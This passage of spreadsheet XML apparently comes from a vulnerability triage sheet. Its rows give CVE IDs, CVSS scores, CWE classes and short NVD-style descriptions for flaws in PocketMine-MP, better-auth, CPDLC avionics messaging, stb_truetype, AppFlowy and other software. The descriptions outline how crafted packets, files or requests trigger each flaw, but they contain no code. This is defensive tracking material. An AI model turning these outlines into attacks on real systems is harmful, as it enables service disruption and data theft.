        </is>
      </c>
      <c r="B3074" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51013</t>
        </is>
      </c>
      <c r="C3074" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3074" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3074" s="5" t="inlineStr"/>
      <c r="F3074" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3074" s="5" t="inlineStr"/>
      <c r="H3074" s="5" t="inlineStr"/>
      <c r="I3074" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3074" s="5" t="inlineStr"/>
      <c r="K3074" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3074" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.2.3 fail to validate damage metadata values in tool and armor item NBT data received from clients. Attackers can send negative or out-of-range damage values in itemstack NBT to trigger unhandled exceptions in the Durable class, causing server crashes.</t>
        </is>
      </c>
      <c r="M3074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51013</t>
        </is>
      </c>
    </row>
    <row r="3075">
      <c r="A3075" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3075" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51014</t>
        </is>
      </c>
      <c r="C3075" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3075" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3075" s="5" t="inlineStr"/>
      <c r="F3075" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3075" s="5" t="inlineStr"/>
      <c r="H3075" s="5" t="inlineStr"/>
      <c r="I3075" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3075" s="5" t="inlineStr"/>
      <c r="K3075" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L3075" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.0.7 contains an unhandled exception vulnerability in the ModalFormResponsePacket handler when processing malformed JSON from clients. Attackers can send specially crafted form response packets with invalid JSON to trigger an uncaught InvalidArgumentException, causing server crashes.</t>
        </is>
      </c>
      <c r="M3075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51014</t>
        </is>
      </c>
    </row>
    <row r="3076">
      <c r="A3076" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3076" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51015</t>
        </is>
      </c>
      <c r="C3076" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3076" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3076" s="5" t="inlineStr"/>
      <c r="F3076" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3076" s="5" t="inlineStr"/>
      <c r="H3076" s="5" t="inlineStr"/>
      <c r="I3076" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3076" s="5" t="inlineStr"/>
      <c r="K3076" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3076" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.0.6 does not validate facing values in PlayerActionPacket (for START_BREAK and CRACK_BREAK actions) or in UseItemTransactionData (typically within InventoryTransactionPacket). A remote authenticated attacker can send crafted packets with invalid facing values (e.g., negative or out-of-range) to crash the server, resulting in a denial of service.</t>
        </is>
      </c>
      <c r="M3076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51015</t>
        </is>
      </c>
    </row>
    <row r="3077">
      <c r="A3077" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3077" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51018</t>
        </is>
      </c>
      <c r="C3077" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3077" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3077" s="5" t="inlineStr"/>
      <c r="F3077" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3077" s="5" t="inlineStr"/>
      <c r="H3077" s="5" t="inlineStr"/>
      <c r="I3077" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3077" s="5" t="inlineStr"/>
      <c r="K3077" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3077" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 3.26.5 and 4.0.x before 4.0.5 does not limit book page text length, page count, or author/title length. A player who obtains a writable book can create oversized NBT ('book bombs'), causing excess bandwidth consumption and server crashes (exceeding the 1 MB chunk size limit when saving region-based worlds in PM3, or exceeding the 32 KiB TAG_String limit in PM4).</t>
        </is>
      </c>
      <c r="M3077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51018</t>
        </is>
      </c>
    </row>
    <row r="3078">
      <c r="A3078" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3078" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54392</t>
        </is>
      </c>
      <c r="C3078" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3078" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3078" s="5" t="inlineStr"/>
      <c r="F3078" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3078" s="5" t="inlineStr"/>
      <c r="H3078" s="5" t="inlineStr"/>
      <c r="I3078" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3078" s="5" t="inlineStr"/>
      <c r="K3078" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3078" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions &gt;= 4.20.0 before 4.22.3 (and before 5.2.1 in the 5.x branch) fail to validate NBT tag types in BlockActorDataPacket. A player can crash the server by sending a packet containing sign NBT data with an incorrect tag type, triggering an unhandled UnexpectedTagTypeException that terminates the server process.</t>
        </is>
      </c>
      <c r="M3078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54392</t>
        </is>
      </c>
    </row>
    <row r="3079">
      <c r="A3079" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3079" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54396</t>
        </is>
      </c>
      <c r="C3079" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3079" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3079" s="5" t="inlineStr"/>
      <c r="F3079" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3079" s="5" t="inlineStr"/>
      <c r="H3079" s="5" t="inlineStr"/>
      <c r="I3079" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3079" s="5" t="inlineStr"/>
      <c r="K3079" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="L3079" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.8.1 fail to validate dye color IDs in banner NBT data during deserialization. Attackers can provide invalid color values in inventory transactions or via commands to trigger undefined offset errors and crash the server.</t>
        </is>
      </c>
      <c r="M3079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54396</t>
        </is>
      </c>
    </row>
    <row r="3080">
      <c r="A3080" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3080" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-14047</t>
        </is>
      </c>
      <c r="C3080" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3080" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3080" s="5" t="inlineStr"/>
      <c r="F3080" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3080" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3080" s="5" t="inlineStr">
        <is>
          <t>elastic:winlogbeat</t>
        </is>
      </c>
      <c r="I3080" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3080" s="5" t="inlineStr"/>
      <c r="K3080" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3080" s="5" t="inlineStr">
        <is>
          <t>A local vulnerability in the Winlogbeat Windows installer caused runtime files to be placed in a directory writable by unprivileged users. A low-privileged attacker with existing access to the system could pre-position malicious filesystem links, causing a subsequent elevated Winlogbeat operation to write to or delete arbitrary files. Successful exploitation could result in a denial of service.</t>
        </is>
      </c>
      <c r="M3080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-14047</t>
        </is>
      </c>
    </row>
    <row r="3081">
      <c r="A3081" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3081" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58380</t>
        </is>
      </c>
      <c r="C3081" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3081" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3081" s="5" t="inlineStr"/>
      <c r="F3081" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3081" s="5" t="inlineStr"/>
      <c r="H3081" s="5" t="inlineStr"/>
      <c r="I3081" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3081" s="5" t="inlineStr"/>
      <c r="K3081" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3081" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.11.2 contain a denial of service vulnerability in BookEditPacket handling that crashes the server when an invalid inventory slot value is provided. Attackers can send a crafted BookEditPacket with an inventory slot greater than 35 to trigger an unhandled exception and crash the server.</t>
        </is>
      </c>
      <c r="M3081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58380</t>
        </is>
      </c>
    </row>
    <row r="3082">
      <c r="A3082" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3082" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-29419</t>
        </is>
      </c>
      <c r="C3082" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3082" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3082" s="5" t="inlineStr"/>
      <c r="F3082" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3082" s="5" t="inlineStr"/>
      <c r="H3082" s="5" t="inlineStr"/>
      <c r="I3082" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3082" s="5" t="inlineStr"/>
      <c r="K3082" s="5" t="inlineStr">
        <is>
          <t>CWE-300</t>
        </is>
      </c>
      <c r="L3082" s="5" t="inlineStr">
        <is>
          <t>CTFd v3.7.6 was discovered to be vulnerable to a man-in-the-middle attack.</t>
        </is>
      </c>
      <c r="M3082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-29419</t>
        </is>
      </c>
    </row>
    <row r="3083">
      <c r="A3083" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3083" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71400</t>
        </is>
      </c>
      <c r="C3083" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3083" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3083" s="5" t="inlineStr"/>
      <c r="F3083" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3083" s="5" t="inlineStr"/>
      <c r="H3083" s="5" t="inlineStr"/>
      <c r="I3083" s="5" t="inlineStr">
        <is>
          <t>2026-08-02</t>
        </is>
      </c>
      <c r="J3083" s="5" t="inlineStr"/>
      <c r="K3083" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3083" s="5" t="inlineStr">
        <is>
          <t>better-auth passkey versions before 1.4.0 contain an insecure direct object reference vulnerability in the passkey deletion endpoint that allows authenticated users to delete arbitrary passkeys by ID. Attackers with valid sessions can submit crafted requests to the delete-passkey endpoint with enumerated passkey IDs to remove other users' passkeys.</t>
        </is>
      </c>
      <c r="M3083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71400</t>
        </is>
      </c>
    </row>
    <row r="3084">
      <c r="A3084" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3084" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71403</t>
        </is>
      </c>
      <c r="C3084" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3084" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3084" s="5" t="inlineStr"/>
      <c r="F3084" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3084" s="5" t="inlineStr"/>
      <c r="H3084" s="5" t="inlineStr"/>
      <c r="I3084" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J3084" s="5" t="inlineStr"/>
      <c r="K3084" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L3084" s="5" t="inlineStr">
        <is>
          <t>better-auth versions before 1.1.20 contain a bypass vulnerability in trustedOrigins validation logic affecting absolute URLs and wildcard domains. Attackers can construct malicious callbackURL parameters that pass origin checks and trigger open redirects to steal sensitive tokens for account takeover.</t>
        </is>
      </c>
      <c r="M3084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71403</t>
        </is>
      </c>
    </row>
    <row r="3085">
      <c r="A3085" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3085" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71409</t>
        </is>
      </c>
      <c r="C3085" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3085" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3085" s="5" t="inlineStr"/>
      <c r="F3085" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3085" s="5" t="inlineStr"/>
      <c r="H3085" s="5" t="inlineStr"/>
      <c r="I3085" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3085" s="5" t="inlineStr"/>
      <c r="K3085" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L3085" s="5" t="inlineStr">
        <is>
          <t>Lack of authentication for Very High Frequency Data Link messages allows rogue ground stations to inject CPDLC messages leading to unexpected or misleading clearances and potential pilot confusion. This type of attack can be carried out remotely over radio frequency.</t>
        </is>
      </c>
      <c r="M3085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71409</t>
        </is>
      </c>
    </row>
    <row r="3086">
      <c r="A3086" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3086" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71412</t>
        </is>
      </c>
      <c r="C3086" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3086" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3086" s="5" t="inlineStr"/>
      <c r="F3086" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3086" s="5" t="inlineStr"/>
      <c r="H3086" s="5" t="inlineStr"/>
      <c r="I3086" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3086" s="5" t="inlineStr"/>
      <c r="K3086" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="L3086" s="5" t="inlineStr">
        <is>
          <t>Injection of false emergency or status messages over CPDLC may lead to misallocation of resources, operational confusion, and improper response actions by flight crews, traffic controllers, and ground operations.  This type of attack can be carried out remotely over radio frequency.</t>
        </is>
      </c>
      <c r="M3086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71412</t>
        </is>
      </c>
    </row>
    <row r="3087">
      <c r="A3087" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3087" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71417</t>
        </is>
      </c>
      <c r="C3087" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3087" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3087" s="5" t="inlineStr"/>
      <c r="F3087" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3087" s="5" t="inlineStr"/>
      <c r="H3087" s="5" t="inlineStr"/>
      <c r="I3087" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3087" s="5" t="inlineStr"/>
      <c r="K3087" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3087" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.32.1 fails to validate uniqueness of pack UUIDs in ResourcePackClientResponsePacket STATUS_SEND_PACKS handling, allowing authenticated clients to trigger duplicate pack transmissions. Attackers can send multiple copies of valid pack UUIDs in a single packet to exhaust server memory and cause denial of service.</t>
        </is>
      </c>
      <c r="M3087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71417</t>
        </is>
      </c>
    </row>
    <row r="3088">
      <c r="A3088" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11573</t>
        </is>
      </c>
      <c r="C3088" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3088" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3088" s="5" t="inlineStr"/>
      <c r="F3088" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3088" s="5" t="inlineStr"/>
      <c r="H3088" s="5" t="inlineStr"/>
      <c r="I3088" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3088" s="5" t="inlineStr"/>
      <c r="K3088" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L3088" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion (CWE-674) in the QDomDocument/QDomNode serialization path of the Qt XML module (QtXml, qtbase). QDomElementPrivate::save() and QDomNodePrivate::save() recurse mutually, consuming one stack frame per level of element nesting with no depth limit, no configurable bound and no error return. A document with deeply nested elements parses successfully but exhausts the call stack and terminates the process when serialized. Reachable via QDomDocument::toByteArray() (Qt 4.0 and later), QDomDocument::toString(), QDomDocument::toCString(), QDomNode::save(), and operator&lt;&lt;(QTextStream&amp;, const QDomNode&amp;). Denial of service only — no code execution and no memory disclosure.</t>
        </is>
      </c>
      <c r="M3088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11573</t>
        </is>
      </c>
    </row>
    <row r="3089">
      <c r="A3089" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16007</t>
        </is>
      </c>
      <c r="C3089" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3089" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3089" s="5" t="inlineStr"/>
      <c r="F3089" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3089" s="5" t="inlineStr"/>
      <c r="H3089" s="5" t="inlineStr"/>
      <c r="I3089" s="5" t="inlineStr">
        <is>
          <t>2026-08-15</t>
        </is>
      </c>
      <c r="J3089" s="5" t="inlineStr"/>
      <c r="K3089" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3089" s="5" t="inlineStr">
        <is>
          <t>AppFlowy's qcuiknote feature is affected by a SQL injection vulnerability. Authenticated users with access to the feature can inject arbitrary SQL to exfiltrate data in the underlying SQL database.</t>
        </is>
      </c>
      <c r="M3089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16007</t>
        </is>
      </c>
    </row>
    <row r="3090">
      <c r="A3090" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16118</t>
        </is>
      </c>
      <c r="C3090" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3090" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3090" s="5" t="inlineStr"/>
      <c r="F3090" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3090" s="5" t="inlineStr"/>
      <c r="H3090" s="5" t="inlineStr"/>
      <c r="I3090" s="5" t="inlineStr">
        <is>
          <t>2026-07-17</t>
        </is>
      </c>
      <c r="J3090" s="5" t="inlineStr"/>
      <c r="K3090" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3090" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in xdgmime. A heap-based buffer overflow can be triggered in _xdg_mime_magic_parse_magic_line() in the xdgmimemagic.c file on little-endian systems when an attacker-controlled MIME magic file in a user-writable XDG data location (e.g., in the $XDG_DATA_HOME/mime/magic path) is parsed by an application performing MIME type detection (e.g., via g_content_type_guess()). When performing byte-swap, incorrect pointer arithmetic on the write side causes an out-of-bounds write of 2 bytes, resulting in an application crash or memory corruption.</t>
        </is>
      </c>
      <c r="M3090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16118</t>
        </is>
      </c>
    </row>
    <row r="3091">
      <c r="A3091" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16281</t>
        </is>
      </c>
      <c r="C3091" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3091" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3091" s="5" t="inlineStr"/>
      <c r="F3091" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3091" s="5" t="inlineStr"/>
      <c r="H3091" s="5" t="inlineStr"/>
      <c r="I3091" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3091" s="5" t="inlineStr"/>
      <c r="K3091" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3091" s="5" t="inlineStr">
        <is>
          <t>The Classified Listing  WordPress plugin before 6.1.1 does not verify that the caller owns or can edit the target listing before its AI image-editing AJAX action deletes or attaches media, allowing any authenticated user, including a subscriber, to permanently delete attachments from, and attach files to, any listing owned by another user.</t>
        </is>
      </c>
      <c r="M3091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16281</t>
        </is>
      </c>
    </row>
    <row r="3092">
      <c r="A3092" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16769</t>
        </is>
      </c>
      <c r="C3092" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3092" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3092" s="5" t="inlineStr"/>
      <c r="F3092" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3092" s="5" t="inlineStr"/>
      <c r="H3092" s="5" t="inlineStr"/>
      <c r="I3092" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3092" s="5" t="inlineStr"/>
      <c r="K3092" s="5" t="inlineStr">
        <is>
          <t>CWE-440</t>
        </is>
      </c>
      <c r="L3092" s="5" t="inlineStr">
        <is>
          <t>An unencrypted 'pause encryption request' message causes a denial of service in the in the RS9116W/SiWx917. See vulnerability B-E10 in the related paper below.</t>
        </is>
      </c>
      <c r="M3092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16769</t>
        </is>
      </c>
    </row>
    <row r="3093">
      <c r="A3093" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17627</t>
        </is>
      </c>
      <c r="C3093" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3093" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3093" s="5" t="inlineStr"/>
      <c r="F3093" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3093" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H3093" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I3093" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3093" s="5" t="inlineStr"/>
      <c r="K3093" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3093" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to obtain sensitive information and inject messages into workflow history due to improper authorization.</t>
        </is>
      </c>
      <c r="M3093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17627</t>
        </is>
      </c>
    </row>
    <row r="3094">
      <c r="A3094" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18497</t>
        </is>
      </c>
      <c r="C3094" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3094" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3094" s="5" t="inlineStr"/>
      <c r="F3094" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3094" s="5" t="inlineStr"/>
      <c r="H3094" s="5" t="inlineStr"/>
      <c r="I3094" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3094" s="5" t="inlineStr"/>
      <c r="K3094" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3094" s="5" t="inlineStr">
        <is>
          <t>A heap-buffer-overflow vulnerability exists in the nothings stb TrueType library, up to version 1.26, that is used for parsing TrueType font files. The vulnerability exists in the stbtt__GetGlyphShapeTT() function within the nothings stb_truetype.h library when parsing malformed TTF (TrueType Font) files. The vulnerability resides in the glyph data parsing path.
An attacker can craft a malformed TTF file with an inflated endPtsOfContours value and truncate the remaining glyph data. When an application utilizing stb_truetype.h (such as various game engines or graphics software) attempts to load, bake, or render this malformed font via stbtt_GetGlyphShape(), the parser will attempt to read past the end of the glyph data buffer, triggering the out-of-bounds read.</t>
        </is>
      </c>
      <c r="M3094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18497</t>
        </is>
      </c>
    </row>
    <row r="3095">
      <c r="A3095" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18620</t>
        </is>
      </c>
      <c r="C3095" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3095" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3095" s="5" t="inlineStr"/>
      <c r="F3095" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3095" s="5" t="inlineStr"/>
      <c r="H3095" s="5" t="inlineStr"/>
      <c r="I3095" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3095" s="5" t="inlineStr"/>
      <c r="K3095" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3095" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Data Science Pipelines. A restricted user, or tenant, can exploit an improper authorization vulnerability in the setDefaultServiceAccount function. By specifying a more privileged ServiceAccount (SA) during a CreateRun request, an attacker can bypass authorization checks. This allows the tenant to run their containers with elevated privileges, potentially leading to the disclosure of sensitive information (secrets) and the ability to execute commands within other users' pods.</t>
        </is>
      </c>
      <c r="M3095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18620</t>
        </is>
      </c>
    </row>
    <row r="3096">
      <c r="A3096" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
